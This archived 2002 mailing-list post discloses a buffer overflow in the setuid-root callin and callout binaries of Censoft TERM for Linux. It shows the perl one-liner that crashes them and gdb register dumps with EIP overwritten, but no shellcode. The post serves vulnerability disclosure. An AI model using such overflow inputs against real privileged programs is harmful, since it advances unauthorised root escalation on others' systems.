Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Censoft TERM Emu bOf

From: KF <dotslash () snosoft com>
Date: Fri, 22 Feb 2002 13:16:18 -0500


Vendor: www.censoft.com

Product: TERM for UNIX / Linux
Emulations Wyse 60, SCO ANSI, VT220 Terminal
Supports SCO, AIX, HP, DEC, Solaris Operating Environment[tm] software, and Linux[tm] 

I WAS going to purchase this product after trying the eval however I changed my mind for some reason...I would Imagine 
the full
product is also vulnerable

[elguapo@linux elguapo]$ ftp ftp.censoft.com
Connected to ftp.censoft.com.
220 ns.centurysoftware.com FTP server (Version 6.00) ready.
Name (ftp.censoft.com:elguapo): anonymous
331 Guest login ok, send your email address as password.
Password:
230- Welcome To Century Software Ftp Server.
230-
230- Here you will find all the Century Software
230- Products.
230-
...
ftp> cd download/windows/linux
250 CWD command successful.
ftp> get termlx.tar
local: termlx.tar remote: termlx.tar
200 PORT command successful.
150 Opening BINARY mode data connection for 'termlx.tar' (931840 bytes).
226 Transfer complete.

As you can see the .tar file has some suid root stuff to play with
[elguapo@linux elguapo]$ tar tvf termlx.tar
-rwxr-xr-x root/root    630976 2000-04-01 02:00:00 term
-rwsr-xr-x root/root     96988 1999-03-22 23:52:10 callin
-rwsr-xr-x root/root     97144 1999-03-22 23:52:11 callout
-rwxr-xr-x root/root     94484 1999-03-22 23:52:10 brand

Aparantly I don't play nice
[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin `perl -e 'print "A" x 9000'`
Arguments must be of form ttyNN
[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin tty`perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

rm /etc/LCK..inittab  if you need to try again or you will get the following message
Non-expired lockfile: /etc/LCK..inittab     

Lets check the stack out a bit.
[root@linux /root]# gdb  /home/elguapo/Censoft/callin core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0xbfffd3a4       -1073753180
edx            0x1      1
ebx            0x805fdf0        134610416
esp            0xbfffd3ec       0xbfffd3ec
ebp            0x42424242       0x42424242
esi            0xbfffd400       -1073753088
edi            0xbfffd858       -1073751976
eip            0x42424242       0x42424242

the callout binary is also affected. 
[root@linux /root]# /home/elguapo/Censoft/callout tty`perl -e 'print "B" x 9000'`
Segmentation fault (core dumped)

[root@linux /root]# gdb  /home/elguapo/Censoft/callout core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0xbfffd3a4       -1073753180
edx            0x1      1
ebx            0x805fe88        134610568
esp            0xbfffd3ec       0xbfffd3ec
ebp            0x42424242       0x42424242
esi            0xbfffd400       -1073753088
edi            0xbfffd856       -1073751978
eip            0x42424242       0x42424242


-KF
Previous By Date Next
Previous By Thread Next

Current thread: